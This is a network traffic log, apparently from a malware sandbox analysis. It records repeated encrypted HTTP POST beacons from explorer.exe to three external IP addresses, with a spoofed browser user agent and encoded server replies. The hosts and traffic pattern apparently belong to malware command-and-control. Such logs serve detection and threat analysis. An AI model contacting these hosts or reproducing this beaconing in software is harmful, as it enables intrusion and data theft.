2024-07-27 05:32:36 UTC	1122	OUT	Data Raw: 57 42 4f 49 32 2f 72 72 6f 67 4a 55 6d 62 4f 4e 6b 63 55 6f 44 2f 57 78 6b 4d 4f 37 5a 43 31 53 2b 59 36 52 52 58 31 72 4b 31 2f 54 41 45 6a 5a 31 41 5a 57 63 38 6f 6a 6c 76 4a 73 4f 63 70 45 4f 6a 6c 51 31 37 73 48 73 65 4f 31 6b 45 78 37 57 37 64 48 35 66 34 49 5a 2f 48 69 69 6b 6c 62 65 52 7a 32 76 59 41 4d 4d 54 46 54 6b 36 35 50 31 31 42 58 45 56 79 33 35 63 5a 51 6b 54 73 78 30 47 4a 48 6b 4a 2f 39 36 44 4f 76 30 56 73 56 56 2b 30 46 44 72 4a 48 7a 56 37 4a 44 43 44 4b 6c 58 59 6d 52 4f 46 6e 43 54 70 50 7a 2f 64 47 62 65 59 37 48 6f 77 52 69 44 46 62 75 62 4c 72 68 4f 4d 47 69 59 56 43 41 38 71 65 43 72 6a 68 71 58 31 30 55 52 6e 64 76 67 65 5a 35 30 4d 38 34 64 31 58 78 72 4b 66 45 45 31 36 38 5a 4c 4e 51 30 64 72 55 78 6e 79 64 69 2f 30 7a 4e 65 Data Ascii: WBOI2/rrogJUmbONkcUoD/WxkMO7ZC1S+Y6RRX1rK1/TAEjZ1AZWc8ojlvJsOcpEOjlQ17sHseO1kEx7W7dH5f4IZ/HiiklbeRz2vYAMMTFTk65P11BXEVy35cZQkTsx0GJHkJ/96DOv0VsVV+0FDrJHzV7JDCDKlXYmROFnCTpPz/dGbeY7HowRiDFbubLrhOMGiYVCA8qeCrjhqX10URndvgeZ50M84d1XxrKfEE168ZLNQ0drUxnydi/0zNe
2024-07-27 05:32:37 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:32:37 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:32:37 UTC	685	IN	Data Raw: 69 48 39 62 57 55 58 78 6a 77 6e 66 66 77 76 6a 6b 70 43 30 46 37 6c 49 30 46 50 62 34 45 49 4f 78 37 78 50 69 75 72 53 68 46 67 61 76 48 4b 36 69 50 51 34 6e 41 59 57 59 33 53 66 38 34 33 62 7a 7a 33 54 44 6c 30 35 4e 4f 4d 77 48 34 76 6b 69 6c 7a 6b 6c 55 4b 2f 69 64 48 37 79 59 2f 65 78 34 6d 44 31 61 70 43 44 46 68 55 55 54 6c 64 43 74 4c 6c 64 30 4a 4f 48 39 35 61 32 45 74 46 67 31 47 65 69 75 6c 66 35 5a 75 53 39 6f 76 55 74 66 53 49 58 61 68 65 53 4f 41 67 6b 57 6a 4f 4c 45 4b 62 58 6d 38 4c 2f 4b 6b 68 7a 6c 30 57 45 72 43 38 4a 63 79 39 33 56 66 68 72 37 68 32 39 64 78 54 65 4c 4d 64 62 66 68 66 63 4d 69 42 4e 68 2f 37 6a 51 73 67 39 48 39 32 64 30 35 38 39 36 61 55 33 54 35 71 73 53 53 33 51 6e 35 78 34 6f 38 64 37 50 38 53 66 55 44 6a 77 70 30 Data Ascii: iH9bWUXxjwnffwvjkpC0F7lI0FPb4EIOx7xPiurShFgavHK6iPQ4nAYWY3Sf843bzz3TDl05NOMwH4vkilzklUK/idH7yY/ex4mD1apCDFhUUTldCtLld0JOH95a2EtFg1Geiulf5ZuS9ovUtfSIXaheSOAgkWjOLEKbXm8L/Kkhzl0WErC8Jcy93Vfhr7h29dxTeLMdbfhfcMiBNh/7jQsg9H92d05896aU3T5qsSS3Qn5x4o8d7P8SfUDjwp0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.5	51911	167.235.128.153	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:32:38 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:32:38 UTC	1122	OUT	Data Raw: 46 45 41 69 43 4c 43 49 45 55 51 38 54 49 64 77 79 66 36 73 49 5a 4c 59 59 6d 2b 33 41 33 43 4a 70 78 46 71 6c 46 36 37 6b 57 70 4c 68 6a 5a 37 59 65 31 35 72 39 6d 31 31 59 46 54 4a 54 76 67 65 32 2b 6f 71 39 64 64 53 76 70 49 43 6b 74 4d 34 45 56 4d 74 49 39 74 71 43 57 70 59 6e 49 56 44 71 41 47 45 59 50 53 72 56 7a 59 76 32 74 2f 42 52 78 72 2b 4b 75 58 5a 34 6c 6e 42 65 4d 61 66 65 48 45 52 73 6e 36 57 2b 53 6f 32 54 62 74 42 50 31 49 41 76 59 38 48 61 6e 54 56 6c 57 6f 61 44 48 64 34 78 6a 74 79 64 64 69 51 71 61 79 33 5a 48 45 46 78 41 71 2b 52 2b 76 49 59 76 54 4e 67 71 79 74 58 4d 73 79 79 46 75 45 50 71 4b 42 31 46 53 36 4b 4c 69 70 77 57 59 31 42 76 45 54 30 70 2b 6b 6e 30 43 6f 76 46 37 4d 74 4c 43 61 53 45 42 6c 77 6f 7a 7a 4f 45 48 65 4f 4e Data Ascii: FEAiCLCIEUQ8TIdwyf6sIZLYYm+3A3CJpxFqlF67kWpLhjZ7Ye15r9m11YFTJTvge2+oq9ddSvpICktM4EVMtI9tqCWpYnIVDqAGEYPSrVzYv2t/BRxr+KuXZ4lnBeMafeHERsn6W+So2TbtBP1IAvY8HanTVlWoaDHd4xjtyddiQqay3ZHEFxAq+R+vIYvTNgqytXMsyyFuEPqKB1FS6KLipwWY1BvET0p+kn0CovF7MtLCaSEBlwozzOEHeON
2024-07-27 05:32:39 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:32:39 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:32:39 UTC	685	IN	Data Raw: 6b 50 35 53 79 76 4b 54 46 67 55 46 48 71 75 49 36 4f 32 68 6d 39 42 46 63 48 70 76 63 43 56 71 64 56 39 4e 55 43 2b 6b 50 72 65 56 4e 65 6e 63 48 4a 43 4d 5a 77 57 75 63 6c 6b 55 5a 61 54 74 43 38 51 7a 74 71 39 59 55 61 6c 57 4a 4c 64 37 49 58 6c 75 35 42 33 38 2f 53 62 33 2f 4c 69 68 69 68 64 39 58 4e 78 6e 50 46 4e 4a 66 54 7a 6c 53 5a 62 58 35 33 4f 55 54 6b 6f 6a 57 63 67 44 30 52 30 63 4c 43 70 41 70 5a 66 37 38 75 74 64 30 4b 44 41 41 74 34 68 67 44 5a 58 38 51 79 68 62 32 4d 63 4f 50 2f 4c 5a 31 51 78 64 6d 6d 78 6c 38 75 6c 62 59 76 58 48 74 2f 64 47 6f 61 52 61 61 41 58 5a 37 52 72 49 70 2f 37 64 62 6f 6b 55 4a 32 74 2f 53 44 36 32 34 69 4c 55 74 30 49 44 73 6a 30 65 4c 68 77 73 6d 42 68 50 70 56 34 70 69 6b 76 35 4e 34 54 74 48 6e 6d 7a 4b 35 Data Ascii: kP5SyvKTFgUFHquI6O2hm9BFcHpvcCVqdV9NUC+kPreVNencHJCMZwWuclkUZaTtC8Qztq9YUalWJLd7IXlu5B38/Sb3/Lihihd9XNxnPFNJfTzlSZbX53OUTkojWcgD0R0cLCpApZf78utd0KDAAt4hgDZX8Qyhb2McOP/LZ1Qxdmmxl8ulbYvXHt/dGoaRaaAXZ7RrIp/7dbokUJ2t/SD624iLUt0IDsj0eLhwsmBhPpV4pikv5N4TtHnmzK5

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.5	51912	107.173.160.137	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:32:40 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 05:32:40 UTC	1267	OUT	Data Raw: 68 7a 64 46 66 55 78 6e 43 77 4b 56 6d 31 42 6d 42 34 61 44 34 47 5a 41 65 72 58 64 65 57 62 31 2b 64 31 70 36 69 62 73 54 64 79 5a 52 55 42 4b 70 77 6a 32 79 72 73 39 62 72 47 4e 39 53 66 35 4e 78 71 72 42 69 71 2b 4c 55 57 44 73 34 4d 67 6f 59 6b 6e 77 76 61 78 36 4a 58 48 64 46 7a 6d 62 78 6a 69 6c 4d 46 67 73 78 2b 51 6b 33 48 62 4d 30 6d 39 72 70 47 33 32 68 54 71 6d 7a 72 61 35 43 4c 39 4e 47 6c 51 4e 4d 6f 39 6e 62 71 34 46 52 70 64 52 47 4d 63 58 4c 70 76 6d 52 43 72 53 37 58 6a 33 47 6f 4c 41 76 50 34 41 65 45 32 56 30 61 78 4b 44 46 52 68 33 68 38 38 78 52 63 32 63 43 66 41 63 51 6b 2b 61 39 2b 32 6b 35 36 62 59 68 5a 4e 43 75 79 6d 56 4e 41 51 74 43 4a 32 73 51 77 2f 39 69 2b 75 6d 30 69 53 4b 6f 41 34 34 6f 50 68 35 4f 38 71 4e 56 38 71 36 45 Data Ascii: hzdFfUxnCwKVm1BmB4aD4GZAerXdeWb1+d1p6ibsTdyZRUBKpwj2yrs9brGN9Sf5NxqrBiq+LUWDs4MgoYknwvax6JXHdFzmbxjilMFgsx+Qk3HbM0m9rpG32hTqmzra5CL9NGlQNMo9nbq4FRpdRGMcXLpvmRCrS7Xj3GoLAvP4AeE2V0axKDFRh3h88xRc2cCfAcQk+a9+2k56bYhZNCuymVNAQtCJ2sQw/9i+um0iSKoA44oPh5O8qNV8q6E
2024-07-27 05:32:41 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:32:41 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:32:41 UTC	685	IN	Data Raw: 68 36 46 48 39 43 74 7a 74 42 65 4e 33 6e 70 55 74 64 65 63 41 75 67 42 2b 72 4a 57 45 31 6c 6c 34 62 5a 72 55 35 57 69 56 6d 42 4e 62 75 50 79 79 37 53 74 32 4b 36 55 62 56 64 46 6d 6c 71 6c 49 51 39 55 34 59 6e 6c 6f 35 45 6d 7a 53 6a 4a 5a 77 78 47 39 47 6c 4c 6c 61 50 43 57 6a 34 68 57 2b 57 53 6f 44 48 38 4d 4f 35 76 49 78 72 51 79 79 47 79 63 65 61 69 72 48 4e 30 57 48 43 69 34 52 6e 6a 46 2f 46 4f 59 39 6d 79 72 47 5a 39 39 56 66 52 4a 68 33 53 34 78 7a 4a 6e 53 48 64 4a 56 52 2f 73 32 48 75 66 64 6b 55 64 4e 58 50 6d 67 2f 72 4f 38 76 46 6c 72 7a 55 76 76 46 56 73 50 42 4c 46 79 56 4b 53 47 36 52 46 30 36 57 55 37 48 39 5a 68 48 71 39 49 64 37 63 4e 4e 6e 30 30 69 6e 36 4a 6a 6d 69 53 2b 4e 2b 6a 54 46 4f 5a 42 49 36 62 6e 6e 48 33 44 66 35 5a 46 Data Ascii: h6FH9CtztBeN3npUtdecAugB+rJWE1ll4bZrU5WiVmBNbuPyy7St2K6UbVdFmlqlIQ9U4Ynlo5EmzSjJZwxG9GlLlaPCWj4hW+WSoDH8MO5vIxrQyyGyceairHN0WHCi4RnjF/FOY9myrGZ99VfRJh3S4xzJnSHdJVR/s2HufdkUdNXPmg/rO8vFlrzUvvFVsPBLFyVKSG6RF06WU7H9ZhHq9Id7cNNn00in6JjmiS+N+jTFOZBI6bnnH3Df5ZF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.5	51913	107.173.160.139	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:32:42 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:32:42 UTC	1122	OUT	Data Raw: 56 49 67 53 63 48 2b 78 2b 52 59 50 35 63 46 37 6b 55 57 52 55 34 59 6b 51 32 39 76 77 48 30 44 34 35 4c 67 6d 56 63 2b 61 5a 32 4b 4c 42 67 67 70 4b 31 4d 43 7a 61 77 57 49 4f 69 68 44 64 74 54 70 46 76 74 70 6b 4f 47 59 6a 2f 56 50 43 52 45 64 4b 4b 45 2f 56 57 47 67 71 6e 68 77 44 67 62 6d 69 7a 6d 2b 46 41 53 6e 61 67 79 6b 44 58 37 75 56 35 63 4b 78 35 34 2b 79 7a 73 66 79 65 35 79 76 4c 32 73 45 73 4a 63 2f 63 44 6b 6c 6b 2b 50 35 70 45 52 72 41 37 50 57 56 43 41 71 2f 63 71 51 77 41 44 5a 66 33 56 61 6b 74 4a 41 43 43 41 4b 78 38 4a 55 39 74 59 4f 68 2b 5a 78 38 4b 4e 50 4b 56 63 53 35 54 76 6b 4a 48 75 44 6d 73 44 37 66 50 4a 4e 2f 42 42 53 43 36 65 32 59 6f 54 75 53 45 6a 33 64 2b 34 4d 31 77 2b 34 32 54 33 35 72 72 36 33 77 59 30 52 6c 4e 4e 45 Data Ascii: VIgScH+x+RYP5cF7kUWRU4YkQ29vwH0D45LgmVc+aZ2KLBggpK1MCzawWIOihDdtTpFvtpkOGYj/VPCREdKKE/VWGgqnhwDgbmizm+FASnagykDX7uV5cKx54+yzsfye5yvL2sEsJc/cDklk+P5pERrA7PWVCAq/cqQwADZf3VaktJACCAKx8JU9tYOh+Zx8KNPKVcS5TvkJHuDmsD7fPJN/BBSC6e2YoTuSEj3d+4M1w+42T35rr63wY0RlNNE
2024-07-27 05:32:43 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:32:43 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:32:43 UTC	685	IN	Data Raw: 41 43 73 38 31 51 67 34 56 64 36 39 55 75 70 74 48 37 79 4e 68 2f 6b 7a 52 48 43 2b 62 6a 33 70 46 53 39 44 6e 62 50 44 58 30 30 4b 6e 30 73 79 70 76 57 79 71 78 41 4f 32 51 79 44 44 55 45 66 4d 32 58 66 34 37 45 62 6b 48 52 6e 6a 56 34 72 56 54 46 5a 39 65 50 4f 4b 62 79 74 51 57 46 5a 75 6d 57 4f 48 70 50 48 4e 6d 37 46 32 2b 55 4f 50 79 78 33 54 44 43 6d 35 49 77 5a 41 43 74 74 6d 66 4d 58 61 71 45 39 30 4b 74 57 55 6c 64 52 39 32 31 68 75 6a 72 4d 51 6d 55 79 2b 75 55 55 30 76 62 59 51 30 6e 47 48 41 38 2b 4a 47 64 37 30 38 69 38 45 33 78 72 54 66 57 61 62 2f 32 61 7a 72 67 53 76 37 37 79 68 56 36 39 38 75 51 6e 30 51 4d 4e 58 68 72 70 69 36 5a 59 75 68 34 72 32 4e 5a 46 34 47 55 69 2f 59 70 42 6a 58 69 5a 63 6b 2b 52 2f 30 44 42 62 65 48 70 46 36 62 Data Ascii: ACs81Qg4Vd69UuptH7yNh/kzRHC+bj3pFS9DnbPDX00Kn0sypvWyqxAO2QyDDUEfM2Xf47EbkHRnjV4rVTFZ9ePOKbytQWFZumWOHpPHNm7F2+UOPyx3TDCm5IwZACttmfMXaqE90KtWUldR921hujrMQmUy+uUU0vbYQ0nGHA8+JGd708i8E3xrTfWab/2azrgSv77yhV698uQn0QMNXhrpi6ZYuh4r2NZF4GUi/YpBjXiZck+R/0DBbeHpF6b

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.5	51915	167.235.128.153	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:32:44 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:32:44 UTC	1122	OUT	Data Raw: 44 72 56 62 70 72 68 6d 67 50 79 4c 49 4f 4c 6c 66 54 46 72 66 76 68 4f 4c 6c 57 37 77 67 4d 55 2b 6d 69 38 31 52 42 30 6f 73 54 2f 4f 35 33 6d 41 41 31 53 44 6a 47 79 70 72 70 4e 69 4b 4e 6a 59 33 4a 68 62 4b 59 49 57 74 42 64 6f 63 62 37 44 54 67 30 41 4d 61 66 4b 79 47 75 35 75 44 38 6b 33 6f 36 75 52 63 6f 49 46 37 72 75 66 4b 66 4c 34 61 78 58 61 30 67 36 46 66 6c 2b 48 72 44 30 67 79 6d 39 45 73 59 4d 78 4a 71 30 53 56 47 7a 41 7a 39 36 51 65 4d 57 4c 43 6c 67 6e 58 32 31 2f 4f 4f 6a 70 6a 4b 64 66 76 57 31 33 38 73 35 64 4e 43 56 78 56 63 39 5a 65 4b 2f 75 33 67 44 78 6e 36 52 7a 76 4d 72 58 79 56 65 4b 35 6b 52 47 68 41 56 5a 30 7a 50 33 69 5a 36 2b 6a 5a 4c 62 4c 63 74 78 30 4a 67 75 6f 46 46 33 73 66 78 4a 76 55 41 7a 51 66 61 48 38 4d 4e 68 68 Data Ascii: DrVbprhmgPyLIOLlfTFrfvhOLlW7wgMU+mi81RB0osT/O53mAA1SDjGyprpNiKNjY3JhbKYIWtBdocb7DTg0AMafKyGu5uD8k3o6uRcoIF7rufKfL4axXa0g6Ffl+HrD0gym9EsYMxJq0SVGzAz96QeMWLClgnX21/OOjpjKdfvW138s5dNCVxVc9ZeK/u3gDxn6RzvMrXyVeK5kRGhAVZ0zP3iZ6+jZLbLctx0JguoFF3sfxJvUAzQfaH8MNhh
2024-07-27 05:32:45 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:32:45 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:32:45 UTC	685	IN	Data Raw: 55 61 55 33 6f 2f 5a 50 6f 6d 58 30 76 52 32 39 6a 56 61 30 58 79 72 71 46 5a 44 4f 2b 4c 71 64 68 63 45 35 79 4b 56 5a 34 53 68 70 32 4b 6b 6c 32 48 57 63 42 53 49 6c 42 36 59 78 36 37 44 33 36 52 38 38 72 48 74 47 2f 53 34 74 59 4d 33 47 4b 48 6b 48 7a 4b 65 44 4a 64 64 46 66 41 32 47 75 48 6c 46 66 39 4e 79 4c 30 6f 79 4c 70 56 52 41 76 76 51 56 41 36 56 66 30 4f 4e 66 4e 4d 75 4a 6a 45 77 6d 4d 44 4a 4c 5a 62 78 78 6c 53 54 4c 72 6b 5a 6e 4e 42 46 7a 4b 7a 6f 48 46 79 36 56 73 75 55 4d 37 79 51 6a 67 79 70 51 51 55 61 61 74 42 34 53 69 4a 76 78 37 2b 46 71 73 74 71 56 52 44 34 54 4b 69 4b 6e 69 43 4f 6b 45 6d 74 76 75 79 4e 64 39 65 2b 36 6c 6b 38 51 53 47 6d 36 72 73 46 4a 50 52 4f 46 43 7a 6d 34 76 71 44 66 4d 57 32 6a 7a 61 54 77 30 5a 75 39 79 44 Data Ascii: UaU3o/ZPomX0vR29jVa0XyrqFZDO+LqdhcE5yKVZ4Shp2Kkl2HWcBSIlB6Yx67D36R88rHtG/S4tYM3GKHkHzKeDJddFfA2GuHlFf9NyL0oyLpVRAvvQVA6Vf0ONfNMuJjEwmMDJLZbxxlSTLrkZnNBFzKzoHFy6VsuUM7yQjgypQQUaatB4SiJvx7+FqstqVRD4TKiKniCOkEmtvuyNd9e+6lk8QSGm6rsFJPROFCzm4vqDfMW2jzaTw0Zu9yD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.5	51916	107.173.160.137	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:32:46 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:32:46 UTC	1122	OUT	Data Raw: 57 78 31 59 6f 56 78 66 6c 2b 50 54 75 4a 6d 6e 2f 76 69 50 50 34 74 50 75 63 6d 4f 47 7a 39 52 76 55 4a 54 49 71 6c 4f 2f 43 74 4e 4a 38 4e 39 76 2f 6a 52 6b 52 50 79 52 35 52 62 64 46 72 6c 5a 4c 58 6e 4a 79 50 6a 70 38 51 6b 66 51 64 7a 59 6b 66 4e 78 4a 36 53 51 42 58 59 72 4d 7a 66 58 41 35 73 72 6f 51 53 65 2b 66 50 35 74 2f 38 44 6e 45 70 65 75 54 76 59 54 76 68 55 55 36 6b 74 77 30 46 4c 6c 5a 45 53 37 2f 64 6f 42 64 68 44 69 42 53 47 75 33 33 71 52 34 43 6c 42 31 32 44 35 65 6b 41 78 59 2f 69 62 45 35 30 65 34 51 47 6e 65 6a 69 38 59 79 62 2b 70 4b 70 73 48 63 73 39 33 69 4a 43 56 38 73 73 36 45 56 4d 5a 38 62 36 36 7a 69 69 69 35 30 6a 71 58 6b 67 36 4f 57 79 4e 31 4b 42 49 35 7a 39 54 56 6b 35 7a 54 69 71 36 6d 75 6a 66 59 75 59 4b 79 7a 42 46 Data Ascii: Wx1YoVxfl+PTuJmn/viPP4tPucmOGz9RvUJTIqlO/CtNJ8N9v/jRkRPyR5RbdFrlZLXnJyPjp8QkfQdzYkfNxJ6SQBXYrMzfXA5sroQSe+fP5t/8DnEpeuTvYTvhUU6ktw0FLlZES7/doBdhDiBSGu33qR4ClB12D5ekAxY/ibE50e4QGneji8Yyb+pKpsHcs93iJCV8ss6EVMZ8b66ziii50jqXkg6OWyN1KBI5z9TVk5zTiq6mujfYuYKyzBF
2024-07-27 05:32:47 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:32:47 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:32:47 UTC	685	IN	Data Raw: 53 6c 34 66 37 32 63 57 6e 6c 55 38 36 7a 2f 51 4a 6e 51 79 49 75 53 71 78 6a 4d 43 50 6b 32 34 47 4e 63 6e 33 73 38 72 70 59 54 78 4f 2b 48 33 67 6a 53 79 42 79 66 79 4c 4a 4a 74 4b 70 72 58 50 6d 38 72 46 37 49 66 4b 76 33 63 70 75 71 35 6a 4d 4c 42 4f 72 45 67 78 42 64 47 58 35 79 49 7a 4a 73 6e 33 36 38 78 56 64 54 75 6a 39 4b 4f 48 34 42 46 74 75 39 44 76 72 49 76 2b 57 49 55 74 6a 59 49 6f 2b 50 70 44 55 71 4f 79 5a 7a 7a 48 31 38 32 4d 4e 65 74 32 66 68 50 4c 6e 67 4e 50 59 4f 34 57 50 52 36 43 64 79 55 71 37 42 74 7a 43 58 6c 7a 52 48 4c 34 65 48 66 51 46 46 32 34 6b 6d 73 2b 65 79 74 6f 53 6f 77 59 33 52 46 6d 34 79 58 53 6c 42 7a 36 48 42 49 4b 30 4c 55 63 7a 4e 6d 4b 4b 46 6b 61 79 32 44 39 57 6d 76 48 78 31 34 52 74 6f 78 57 68 57 66 43 58 33 Data Ascii: Sl4f72cWnlU86z/QJnQyIuSqxjMCPk24GNcn3s8rpYTxO+H3gjSyByfyLJJtKprXPm8rF7IfKv3cpuq5jMLBOrEgxBdGX5yIzJsn368xVdTuj9KOH4BFtu9DvrIv+WIUtjYIo+PpDUqOyZzzH182MNet2fhPLngNPYO4WPR6CdyUq7BtzCXlzRHL4eHfQFF24kms+eytoSowY3RFm4yXSlBz6HBIK0LUczNmKKFkay2D9WmvHx14RtoxWhWfCX3

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.5	51917	107.173.160.139	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:32:48 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:32:48 UTC	1122	OUT	Data Raw: 6c 55 33 42 6e 35 52 36 77 48 6b 2b 6b 75 56 4f 4d 4b 4f 61 33 4c 43 51 35 77 75 37 71 4e 41 6a 74 4e 33 76 4e 30 79 4a 6c 4d 53 2b 33 77 66 31 7a 30 61 4b 65 56 79 4d 46 53 45 67 31 31 6e 64 48 71 48 4a 52 54 49 31 41 79 56 35 39 7a 77 75 73 68 71 50 71 52 6a 68 78 2b 33 2f 38 43 37 6b 4a 5a 53 78 70 46 2f 57 4c 4b 78 61 4a 38 59 33 6b 2f 66 74 64 71 50 36 65 67 46 39 4a 75 33 31 66 33 39 6a 75 46 78 43 48 6e 79 64 6b 31 45 4f 38 56 4d 51 31 66 34 68 51 37 75 39 6c 6e 4a 55 58 66 46 65 74 4d 48 68 58 65 6c 48 59 37 72 4f 64 57 4b 72 35 75 31 79 43 62 43 70 55 2f 46 6f 52 61 69 63 64 2f 45 54 77 45 47 4d 4e 4a 71 50 42 63 46 46 55 32 74 4a 69 6b 52 68 30 63 61 51 45 6e 6b 49 65 58 68 38 55 6b 4a 57 54 72 42 77 6b 52 47 47 5a 64 6a 4f 7a 6e 4c 71 39 69 47 Data Ascii: lU3Bn5R6wHk+kuVOMKOa3LCQ5wu7qNAjtN3vN0yJlMS+3wf1z0aKeVyMFSEg11ndHqHJRTI1AyV59zwushqPqRjhx+3/8C7kJZSxpF/WLKxaJ8Y3k/ftdqP6egF9Ju31f39juFxCHnydk1EO8VMQ1f4hQ7u9lnJUXfFetMHhXelHY7rOdWKr5u1yCbCpU/FoRaicd/ETwEGMNJqPBcFFU2tJikRh0caQEnkIeXh8UkJWTrBwkRGGZdjOznLq9iG
2024-07-27 05:32:49 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:32:49 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:32:49 UTC	685	IN	Data Raw: 66 32 74 68 63 54 38 30 64 43 39 31 4f 75 62 53 53 57 31 73 61 52 6c 76 68 4c 6b 5a 38 71 47 32 6f 65 42 4f 4b 42 69 4c 33 50 4b 62 41 67 56 65 48 47 6f 4d 63 69 48 4b 42 66 6f 56 65 52 69 47 36 79 6d 42 71 76 74 74 55 69 6f 42 56 67 70 77 52 77 4b 31 47 58 4e 45 66 51 6c 6c 68 6b 53 49 2f 4a 2f 53 61 71 63 64 6e 4b 38 49 74 65 59 57 39 37 6f 6c 4b 52 5a 75 35 53 44 2f 2b 68 30 6c 44 4f 6a 77 46 48 39 71 67 47 4e 37 39 30 6d 58 56 47 47 68 55 2b 74 53 45 61 71 57 45 51 4b 74 65 68 45 34 6e 66 52 48 68 72 54 41 36 61 6a 6a 5a 59 4c 30 37 39 7a 71 61 72 34 77 58 61 6e 4d 33 59 64 61 6e 56 34 64 63 6d 49 56 30 52 39 49 79 38 6b 31 74 6c 79 39 6d 2b 54 76 4c 33 45 43 69 6d 6c 6d 48 66 79 33 42 64 72 49 79 35 30 70 45 6d 62 32 4b 4a 62 49 66 75 62 6c 49 32 61 Data Ascii: f2thcT80dC91OubSSW1saRlvhLkZ8qG2oeBOKBiL3PKbAgVeHGoMciHKBfoVeRiG6ymBqvttUioBVgpwRwK1GXNEfQllhkSI/J/SaqcdnK8IteYW97olKRZu5SD/+h0lDOjwFH9qgGN790mXVGGhU+tSEaqWEQKtehE4nfRHhrTA6ajjZYL079zqar4wXanM3YdanV4dcmIV0R9Iy8k1tly9m+TvL3ECimlmHfy3BdrIy50pEmb2KJbIfublI2a

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.5	51918	167.235.128.153	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:32:50 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 05:32:50 UTC	1267	OUT	Data Raw: 61 63 67 66 48 59 47 45 44 4d 45 75 4f 45 46 67 4a 52 52 51 62 6d 62 75 75 42 6c 52 44 6e 35 39 76 42 47 57 4b 38 64 30 6b 54 49 74 4c 4f 30 41 62 6b 6b 51 38 63 41 49 76 72 46 45 46 44 79 4c 45 63 35 68 72 46 38 7a 4e 79 61 50 6d 35 77 2f 30 58 61 2b 6b 70 38 33 70 35 67 65 46 57 57 31 65 2f 63 77 46 32 73 35 4d 4b 42 57 63 39 34 6e 59 65 36 41 54 78 6c 4e 62 75 4d 37 2f 6d 31 71 57 31 37 74 30 55 43 69 39 47 63 70 34 46 62 37 37 76 7a 50 2b 32 59 6c 33 71 53 54 38 35 6e 33 6f 66 51 2b 57 6a 36 47 77 31 6e 4c 51 78 6a 38 2f 55 6d 54 39 6b 2f 5a 39 36 74 39 4e 41 70 6f 35 54 69 6f 32 54 55 38 33 43 62 52 44 37 79 36 73 74 42 61 75 72 4f 65 57 6e 49 54 39 34 49 2f 6d 76 4e 6d 48 77 39 30 63 63 5a 66 62 59 7a 70 6d 6f 68 31 49 67 37 39 4b 63 6c 67 38 7a 49 Data Ascii: 